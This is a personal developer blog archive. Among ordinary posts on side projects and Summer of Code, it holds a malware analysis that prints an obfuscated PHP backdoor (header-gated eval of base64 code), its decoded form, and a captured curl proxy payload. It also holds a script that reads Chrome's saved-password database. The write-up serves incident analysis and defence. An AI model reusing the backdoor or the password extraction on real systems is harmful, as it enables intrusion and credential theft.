Fail Early, Fail Often

June 1st, 2011

I have been reading some user experience books lately. While doing so, I came across this gem:

The ceramics teacher announced on opening day that he was dividing the class into two groups. All those on the left side of the studio, he said, would be graded solely on the quantity of work they produced, all those on the right solely on its quality. His procedure was simple: on the final day of class he would bring in his bathroom scales and weigh the work of the “quantity” group: fifty pounds of pots rated an “A”, forty pounds a “B”, and so on. Those being graded on “quality,” however, needed to produce only one pot—albeit a perfect one—to get an “A.” Well, came grading time and a curious fact emerged: the works of highest quality were all produced by the group being graded for quantity. It seems that while the “quantity” group was busily churning out piles of work—and learning from their mistakes—the “quality” group had sat theorizing about perfection, and in the end had little more to show for their efforts than grandiose theories and a pile of dead clay. (Bayles & Orland 2001; p. 29)

Announcing Viral Landing Page

March 2nd, 2011

I have been working on a few projects that require a landing page over the past couple of months, so the topic has been at the forefront of my thoughts recently.  As a Startup Weekend alumnus, I was pretty excited to see that launchrock had fully launched and was gaining quite a bit of traction.  One problem, though, is that I would have to sign up for each project and then promote the links.  I don’t like to post too many links on my Twitter and/or Facebook accounts, so I decided against this.  If you’re not familiar with the concept, here is an excerpt from the description on the Github repo:

When a user submits their e-mail address, it will immediately be recorded to the
local database. The user will then be shown "sharing" icons from Facebook and
Twitter. Each successful click or referral will be recorded to the database for
that user. This makes it easier for you to allow earlier access to people who are
driving traffic to your site.

The next route was to implement something similar myself, which I did over the past couple of days.  The result is viral-landing-page (very original name, I know), which can be found in my Github repositories right now.  Viral-landing-page was written in Ruby on Rails because, well, I love the framework.  For JavaScript, I chose jQuery for similar reasons.

Viral-landing-page is far from polished, but it should be good enough to begin using immediately.  I chose to license it under the BSD open source license, which is quite permissive.  While it isn’t required, I’d like to know who is using this software (and early access to your startup =D).  You can comment on this blog post, or contact me via any other method.  I will be actively adding features (maybe an admin viewer) as I use the project more and more for my own needs.  Feel free to fork and push back any changes!
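
For the curious, the core flow described in that excerpt is tiny.  Here is a minimal sketch of the idea in Python with SQLite (hypothetical table and function names; the actual project is a Rails app, so treat this as pseudocode for the data model rather than its real schema):

import sqlite3

db = sqlite3.connect("landing.db")
db.execute("CREATE TABLE IF NOT EXISTS signups "
           "(email TEXT PRIMARY KEY, referrals INTEGER DEFAULT 0)")

def record_signup(email):
    # Record the e-mail address immediately, then show the sharing icons.
    db.execute("INSERT OR IGNORE INTO signups (email) VALUES (?)", (email,))
    db.commit()

def record_referral(email):
    # Credit each successful click or referral to the referring user.
    db.execute("UPDATE signups SET referrals = referrals + 1 WHERE email = ?",
               (email,))
    db.commit()

def early_access_queue(limit=50):
    # The people driving the most traffic get access first.
    rows = db.execute("SELECT email FROM signups "
                      "ORDER BY referrals DESC LIMIT ?", (limit,))
    return [email for (email,) in rows]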

Export Google Chrome passwords to Keepass

January 1st, 2011

I have recently been complementing the power of Keepass with Dropbox, which allows me to share and access my logins and passwords anywhere with an internet connection while still storing them in a secure manner.  Thanks to the KeepassDroid application, this even includes my phone.

Ever since I began using Keepass, I have been looking for a way to import those pesky web application passwords into it.  Because I have a different login and password for essentially every site I visit, managing and remembering these has been a huge problem in the past.  With several hundred unique login/password combinations, doing this by hand was not an option.  This morning the problem came to a head and I decided to do something about it.

Since Keepass allows importing from its own XML format, the building blocks for an export/import were already there.  I have been learning Ruby lately, so I decided I would whip up a quick script to export my Chrome passwords.

After a bit of hacking, I finished chrome2keepass this morning and you can find it at its Github Repository.
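
For anyone curious what such a script boils down to, here is a rough sketch of the same idea in Python rather than Ruby.  Chrome keeps saved logins in a SQLite database named “Login Data” (table logins, with origin_url, username_value, and password_value columns), and Keepass can import a simple XML format.  The element names below follow the Keepass 1.x XML style, and the sketch assumes the unencrypted password storage Chrome used on Linux at the time (Windows and OS X encrypt the password_value column), so adjust to your platform:

import sqlite3
import xml.etree.ElementTree as ET

def chrome_to_keepass_xml(login_data_path, out_path):
    # Pull the saved logins out of Chrome's SQLite store...
    conn = sqlite3.connect(login_data_path)
    rows = conn.execute("SELECT origin_url, username_value, password_value "
                        "FROM logins")
    # ...and write them back out as Keepass-importable XML entries.
    root = ET.Element("pwlist")
    for url, user, password in rows:
        if isinstance(password, bytes):
            password = password.decode("utf-8", "replace")
        entry = ET.SubElement(root, "pwentry")
        ET.SubElement(entry, "title").text = url
        ET.SubElement(entry, "username").text = user
        ET.SubElement(entry, "url").text = url
        ET.SubElement(entry, "password").text = password
    ET.ElementTree(root).write(out_path, encoding="utf-8")

chrome_to_keepass_xml("Login Data", "chrome-export.xml")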

Local(-ish) Startup Activity

November 4th, 2010

It seems that the Windsor/Metro Detroit area is finally getting some startup assistance love.

No great incubator yet, but we do have a few upcoming events in the area.

This is a great chance for local startup-minded people to network and, as I like to say, increase their geek circle.  If you are one of these people, get out there and get involved.

Unobfuscating an Attack

July 13th, 2010

A client contacted me the other day after experiencing some ‘weird’ traffic.  One of the datacenters we deal with had contacted him and sent along the following logs from an attack that appeared to originate from his server:

access.log:xxx.xxx.xxx.xxx - - [01/Jul/2010:12:15:03 +0000] "GET /wp-login.php HTTP/1.1" 404 2533 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
access.log:xxx.xxx.xxx.xxx - - [01/Jul/2010:12:15:03 +0000] "GET /old/wp-login.php HTTP/1.1" 404 2533 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
access.log:xxx.xxx.xxx.xxx - - [01/Jul/2010:12:15:04 +0000] "GET /cms/wp-login.php HTTP/1.1" 404 2533 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
access.log:xxx.xxx.xxx.xxx - - [01/Jul/2010:12:15:04 +0000] "GET /wp-login.php HTTP/1.1" 404 2537 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
access.log:xxx.xxx.xxx.xxx - - [01/Jul/2010:12:15:05 +0000] "GET /wp-login.php HTTP/1.1" 404 2538 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
access.log:xxx.xxx.xxx.xxx - - [01/Jul/2010:12:15:05 +0000] "GET /blog/wp-login.php HTTP/1.1" 404 2537 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
access.log:xxx.xxx.xxx.xxx - - [01/Jul/2010:12:15:06 +0000] "GET /blog/wp-login.php HTTP/1.1" 404 2533 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
access.log:xxx.xxx.xxx.xxx - - [01/Jul/2010:12:15:06 +0000] "GET /blog_old/wp-login.php HTTP/1.1" 404 2533 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
access.log:xxx.xxx.xxx.xxx - - [01/Jul/2010:12:15:06 +0000] "GET /blog-old/wp-login.php HTTP/1.1" 404 2533 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
access.log:xxx.xxx.xxx.xxx - - [01/Jul/2010:12:15:07 +0000] "GET /blog/wp/wp-login.php HTTP/1.1" 404 2533 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

Obviously, the IPs have been removed to protect the innocent.  What we can see from this log output is that someone is scanning for vulnerable WordPress installations — and the requests look to come from our server.

After some further inspection of the server, it looked as if an ‘attacker’ had uploaded a PHP file to their account and was using it to scour the internet for vulnerable WordPress installs.  A remote machine would send requests to a group of servers hosting this PHP file:

$_fcxxxcc="\x70\x72\x65\x67\x5f\x72\x65\x70\x6c\x61\x63\x65";
$_fcxxxcc("\x7c\x2e\x7c\x65","\x65\x76\x61\x6c\x28\x27\x65\x76\x61\x6c\x28\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65\x28\x22aWYobWQ1KCRfU0VSVkVSWydIVFRQX1FVT1RFJ10pPT0nZTY2ZTZjYWRkNmUxM2VmZWE1NGVkNTBjMGViMmQzMmInIGFuZCBpc3NldCgkX1NFUlZFUlsnSFRUUF9YX0NPREUnXSkpIEBldmFsKEBiYXNlNjRfZGVjb2RlKHN0cnJldihAJF9TRVJWRVJbJ0hUVFBfWF9DT0RFJ10pKSk7\x22\x29\x29\x3b\x27\x29",'.');
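
Those \xNN sequences are just hex escapes, so the first layer peels away mechanically.  A quick check (done here in Python, though any escape decoder will do):

# Expand the PHP-style \xNN hex escapes from the first variable above.
obfuscated = r"\x70\x72\x65\x67\x5f\x72\x65\x70\x6c\x61\x63\x65"
print(obfuscated.encode("ascii").decode("unicode_escape"))  # preg_replace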

I have to give it to them: at least they obfuscated the code.  It took a while before I realized the extent of their hidden code.  Unobfuscating this file gives us:

$_fcxxxcc="preg_replace";
preg_replace("|.|e","eval('eval(base64_decode("aWYobWQ1KCRfU0VSVkVSWydIVFRQX1FVT1RFJ10pPT0nZTY2ZTZjYWRkNmUxM2VmZWE1NGVkNTBjMGViMmQzMmInIGFuZCBpc3NldCgkX1NFUlZFUlsnSFRUUF9YX0NPREUnXSkpIEBldmFsKEBiYXNlNjRfZGVjb2RlKHN0cnJldihAJF9TRVJWRVJbJ0hUVFBfWF9DT0RFJ10pKSk7"));')",'.')

Base64-decoding this string gives us:

if(md5($_SERVER['HTTP_QUOTE'])=='e66e6cadd6e13efea54ed50c0eb2d32b'  and isset($_SERVER['HTTP_X_CODE']))
    @eval(@base64_decode(strrev(@$_SERVER['HTTP_X_CODE'])));

Finally, we’re getting somewhere!
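
As an aside, undoing the attacker’s wrapping on a captured X_CODE header is a one-liner, since the backdoor runs base64_decode(strrev(...)) on it.  A small helper (in Python, name hypothetical) for any request dumps you collect:

import base64

def decode_x_code(header_value):
    # The payload arrives reversed and base64-encoded, so undo both steps.
    return base64.b64decode(header_value[::-1]).decode("utf-8", "replace")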

A brief inspection of the decoded backdoor shows that the attackers send a payload which gets executed on the local system.  But what kind of payload were they sending to their script?  Since the file was being hit quite frequently, dumping the incoming requests to a text file gave us all of the information we were looking for.  After a day, I came back to check on the dump and found a payload that looks like this (decoding and comments by me):

header("X_GZIP: TRUE");
header("X_MD5: 8b72825b0b211b07f8378013cbfb0d17");
error_reporting(E_ALL); ini_set("display_errors",1); $cr=curl_init();
curl_setopt($cr, 13, unserialize(base64_decode("aToxNTs="))); // i:15;
curl_setopt($cr, 19913, unserialize(base64_decode("czoxOiIxIjs="))); // s:1:"1";
curl_setopt($cr, 42, unserialize(base64_decode("czoxOiIxIjs="))); // s:1:"1";
curl_setopt($cr, 53, unserialize(base64_decode("czoxOiIwIjs="))); // s:1:"0";
curl_setopt($cr, 52, unserialize(base64_decode("aTowOw=="))); // i:0;
curl_setopt($cr, 19914, unserialize(base64_decode("czoxOiIxIjs="))); // s:1:"1";
curl_setopt($cr, 64, unserialize(base64_decode("czoxOiIwIjs="))); // s:1:"0";
curl_setopt($cr, 81, unserialize(base64_decode("czoxOiIwIjs="))); // s:1:"0";
curl_setopt($cr, 10023, unserialize(base64_decode("YTo5OntpOjA7czoxMToiQWNjZXB0OiAqLyoiO2k6MTtzOjIyOiJBY2NlcHQtTGFuZ3VhZ2U6IGVuLXVzIjtpOjI7czoyMjoiQ29ubmVjdGlvbjoga2VlcC1hbGl2ZSI7aTozO3M6MTIwOiJVc2VyLUFnZW50OiBNb3ppbGxhLzQuMCAoY29tcGF0aWJsZTsgTVNJRSA3LjA7IFdpbmRvd3MgTlQgNS4xOyBBVCZUIENTTTcuMDsgWVBDIDMuMi4wOyAuTkVUIENMUiAxLjEuNDMyMjsgeXBsdXMgNS4xLjA0YikiO2k6NDtzOjg6IkV4cGVjdDogIjtpOjU7czoxNzoiQWNjZXB0LUVuY29kaW5nOiAiO2k6NjtzOjE1OiJLZWVwLUFsaXZlOiAxMTUiO2k6NztzOjg6IkNvb2tpZTogIjtpOjg7czoxNDk6IlJlZmVyZXI6IGh0dHA6Ly90cmFuc2xhdGUuZ29vZ2xlLmNvbS90cmFuc2xhdGU/aGw9ZW4mc2w9ZW4mdGw9ZnImdT1odHRwJTNBJTJGJTJGODkuMTQ5LjI0Mi4xMjIlMkZkYXRhJTJGMjk1NjA5M185M2NmODdjNGM1NGFlNjVjNjc0ZTlkOWJjOTQ3NjU3OS5odG1sIjt9")));
/* a:9:{i:0;s:11:"Accept: */*";i:1;s:22:"Accept-Language: en-us";i:2;s:22:"Connection: keep-alive";i:3;s:120:"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; AT&T CSM7.0; YPC 3.2.0; .NET CLR 1.1.4322; yplus 5.1.04b)";i:4;s:8:"Expect: ";i:5;s:17:"Accept-Encoding: ";i:6;s:15:"Keep-Alive: 115";i:7;s:8:"Cookie: ";i:8;s:149:"Referer: http://translate.google.com/translate?hl=en&sl=en&tl=fr&u=http%3A%2F%2F89.149.242.122%2Fdata%2F2956093_93cf87c4c54ae65c674e9d9bc9476579.html";} */
curl_setopt($cr, 10102, unserialize(base64_decode("czowOiIiOw=="))); // s:0:"";
curl_setopt($cr, 47, unserialize(base64_decode("aTowOw=="))); // i:0;
curl_setopt($cr, 10002, unserialize(base64_decode("czoxNDA6Imh0dHA6Ly90cmFuc2xhdGUuZ29vZ2xlLmNvbS90cmFuc2xhdGU/aGw9ZW4mc2w9ZW4mdGw9ZnImdT1odHRwJTNBJTJGJTJGODkuMTQ5LjI0Mi4xMjIlMkZkYXRhJTJGMjk1NjA5M185M2NmODdjNGM1NGFlNjVjNjc0ZTlkOWJjOTQ3NjU3OS5odG1sIjs=")));
// s:140:"http://translate.google.com/translate?hl=en&sl=en&tl=fr&u=http%3A%2F%2F89.149.242.122%2Fdata%2F2956093_93cf87c4c54ae65c674e9d9bc9476579.html";
$response=curl_exec($cr);
$md5_error=md5("error");$md5_content=md5("content");$md5_info=md5("info");
if(is_bool($response) and $response == false) {
    echo "<$md5_error>".curl_errno($cr)."|".curl_error($cr)."";
    exit;
}
echo "<$md5_info>".serialize(curl_getinfo($cr))."";
if(function_exists("gzdeflate") and base64_encode(gzdeflate(md5("time"),9))=="MzBPTjazNEmyTDJOSzYzNjM3NEhLNLBIMrM0Mko2MUoCAA=="){
    $response="GZIP|".base64_encode(gzdeflate($response,9));
}
echo "<$md5_content>$response";
exit;

The definition of the curl_setopt call is as follows:

bool curl_setopt ( resource $ch , int $option , mixed $value )

Let’s break down all of the curl options being set here.  Even the curl_setopt calls are obfuscated in the X_CODE payload we receive, using raw integer values instead of the named constants:

  • Option 13 (CURLOPT_TIMEOUT => 15): Sets the timeout for the Curl request to 15 seconds.
  • Option 19913 (CURLOPT_RETURNTRANSFER => “1”): Returns the value of curl_exec as a string.
  • Option 42 (CURLOPT_HEADER => “1”): Includes the header in the output.
  • Option 53 (CURLOPT_TRANSFERTEXT => “0”): Does not use ASCII mode for FTP transfers.
  • Option 52 (CURLOPT_FOLLOWLOCATION => 0): Does not follow ‘Location:’ header fields.
  • Option 19914 (CURLOPT_BINARYTRANSFER => “1”): Returns raw output in conjunction with option 19913 (CURLOPT_RETURNTRANSFER)
  • Option 64 (CURLOPT_SSL_VERIFYPEER => “0”): Does not verify the site’s SSL certificate.
  • Option 81 (CURLOPT_SSL_VERIFYHOST => “0”): Does not check that the certificate matches the hostname.
  • Option 10023 (CURLOPT_HTTPHEADER): Sets the HTTP header sent as follows:
    • “Accept: */*”: Any media type is acceptable in the response.
    • “Accept-Language: en-us”: Specifies that we are looking for an English-language response.
    • “Connection: keep-alive”: Requests a persistent connection (multiple requests over a single connection, essentially).
    • “User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; AT&T CSM7.0; YPC 3.2.0; .NET CLR 1.1.4322; yplus 5.1.04b)”: A bogus user agent
    • “Expect: ”: An empty value suppresses the header entirely, so nothing special is demanded of the server.
    • “Accept-Encoding: ”: An empty value means only the identity (uncompressed) encoding is acceptable (RFC 2616, section 14.3).
    • “Keep-Alive: 115”: Sets a keep-alive timeout of 115 seconds.
    • “Referer: <cut for clarity:  see in source above>”: Sets a seemingly bogus referer, although this may be legit in some cases.
  • Option 10102 (CURLOPT_ENCODING => “”): Setting this to “” tells curl to send an Accept-Encoding header offering all encodings it supports.
  • Option 47 (CURLOPT_POST => 0): We are not doing an HTTP POST.
  • Option 10002 (CURLOPT_URL): Sets the URL to fetch.

If you would like to see a mapping of integer => constant name for the curl options in PHP, you can find that here.
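
If that link ever goes away, you can rebuild a rough version of the mapping yourself: pycurl exposes the raw libcurl option values as module constants.  A quick sketch (rough because a few unrelated integer constants can collide):

import pycurl

# Map integer option values back to libcurl constant names.
opt_names = {value: name for name, value in vars(pycurl).items()
             if isinstance(value, int)}

print(opt_names.get(10002))  # URL, i.e. CURLOPT_URL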

It looks like the attacker was using Google Translate to fetch a website and translate it into another language.  In this case, the payload of the attack is less important than the implications of finding such a file on your server and what it could mean for the users hosted on it.

I think the moral of the story here is to watch what your users may be uploading to your servers.  This two-line file essentially turned one of our machines into an open proxy for whoever was privy to the URL of the script.  It is better to proactively search for these than to sit around and wait for a datacenter to give you a ring.  Of course, you can’t always find them in time.
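
Proactive searching doesn’t have to be fancy, either.  A crude sweep like the sketch below (Python, with hypothetical patterns) will surface most low-effort backdoors; expect false positives and treat hits as leads, not verdicts:

import os
import re

# Strings that show up in a lot of obfuscated PHP backdoors, including
# the hex-escaped "eval" from the file above.
SUSPICIOUS = re.compile(rb"base64_decode|gzinflate|str_rot13|\\x65\\x76\\x61\\x6c")

def sweep(webroot):
    for dirpath, _, files in os.walk(webroot):
        for name in files:
            if name.endswith((".php", ".php5", ".inc")):
                path = os.path.join(dirpath, name)
                with open(path, "rb") as f:
                    if SUSPICIOUS.search(f.read()):
                        print(path)

sweep("/var/www")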

References and Attributions:

  1. PHP: curl_setopt
  2. RFC2616: Hypertext Transfer Protocol — HTTP/1.1

Double Dipping into Domaining

June 4th, 2010

When I first read Andrew Badr's post on his tests with domain squatting^W speculation, I was immediately interested in the methods he used.  Having checked out multiple domain speculation websites in the past, I knew there were improvements to be had over the offerings people put forth.

Coincidentally, I have been reading up on Python lately and have become pretty interested in the language.  For my first script, I decided to explore the 4,4 space in English-word .com domains: domains made of two four-letter words.  I like this space because the pattern is pretty common (facebook = face + book), and I believed that with so many possibilities there would be some great names available.

Andrew used a method that included some manual work, which I wanted to avoid.  I quickly found an English dictionary online and used the grep pattern “^....$”, which works fine for my simple case.  I ended up with 3903 four-letter English words.  This space (3903^2, over 15 million pairs) was far too large to start sending queries out for, and also too large to edit manually.  What to do?

I quickly decided that usage trends for each word were the way to go, and obtained some statistics on how common each word was.  After inserting each word and its relevance into a simple MySQL table, I was ready to begin hammering away to see what was available for registration.

Once I had this data, I stored a reference to each word pair and the combined relevance of the prefix and suffix in another table of the database.  According to my heuristics, this gave me the most relevant list possible of domains built from two four-letter words.
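
For anyone who wants to reproduce the pipeline, here is a compressed sketch of it in Python, skipping the MySQL table and the availability checks; the relevance scores are placeholders for the word-frequency statistics described above:

import heapq
import itertools
import re

# Four-letter words from a standard word list; the count varies by dictionary.
words = sorted({w.strip().lower() for w in open("/usr/share/dict/words")
                if re.fullmatch(r"[a-z]{4}", w.strip())})
relevance = {w: 1.0 for w in words}  # stand-in for real frequency data

# Rank every prefix/suffix pair by the combined relevance of its words.
top = heapq.nlargest(20, ((relevance[a] + relevance[b], a + b + ".com")
                          for a, b in itertools.product(words, repeat=2)))
for score, domain in top:
    print(domain)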

The results are pretty interesting, with many (what I would consider) top-term .com domains available.  Here are some of my favorites, pulled quickly from the file (inb4registration):

  • thisholy.com
  • thatecho.com
  • homehide.com
  • homemeet.com
  • havethem.com

Can we do better?  Like Andrew, I also stored a counter for each time a four-letter word appeared as either a prefix or a suffix.  Tomorrow I will try using this information as a factor in my current heuristics.  I think the biggest improvement possible would be to distribute the requests over a few different boxes (it’s definitely MapReduceable).  If you have any methods for improvement, I would like to hear them as well.  Leave a note in the comments section.

If there’s any interest, I will post my full list (it’s hosted on my home computer).  There are massive possibilities in the 3,4 and 4,3 spaces as well; I would love to hear from you if you begin exploring them.

MTSec Initial Report

May 14th, 2009

I was asked by Aaron Mavrinac to write a report about what exactly MTSec currently does in the code: a summary of what the standard hooks are doing, a list of orders, a list of objects, etc.  For this report I focused mainly on the code itself, essentially the MTSec API as it stands now.  This means that I have already read all of the MTSec code and have a good idea of what is happening within it.  I plan to create a page on the Thousand Parsec Wiki so that others can update my work as they see fit.  Feel free to read my report on the MTSec game module source.

Let the Work Commence

May 6th, 2009

I have officially started my work today for Thousand Parsec.  My GSoC mentor, Aaron Mavrinac, has outlined these items for me to complete in the next week or so:

1. Make a test commit to the tpserver-cpp mtsec branch (add yourself to AUTHORS).
2. Read the TP protocol spec again; make sure you understand what each thing is.
3. Read Part III of the ruleset development manual.
4. Write me a report about what exactly MTSec currently does in the code: a summary of what the standard hooks are doing, a list of orders, a list of objects, etc.

I’ve completed task #1 and am beginning the rest.  My plan is to read the spec over again (I read it many times during the proposal stage) and complete the remaining tasks by the end of the weekend.

My 2009 Thousand Parsec Proposal

May 4th, 2009

I mentioned previously that I would be posting my complete proposal to this blog.  Today I have gone ahead with that, and it is viewable in this post.  Throughout the summer, as I become more acclimated to Thousand Parsec and the Google Summer of Code process, I will post about possible areas of improvement for this proposal.

How To Get Accepted Into Google Summer Of Code (GSoC)

April 30th, 2009

There have been various discussions on both the GSoC mailing list and the official IRC channel about improving your chances of getting into GSoC.  Since the 2009 process has already finished, I have these suggestions for 2010 students and beyond:

  • Be active in the community.
  • Write a good proposal and submit it early.
  • Subscribe to your update notifications for your proposal.
  • Update your proposal.
  • Be active in the community.
  • Submit Patches.

I break each of these criteria down further in the full post.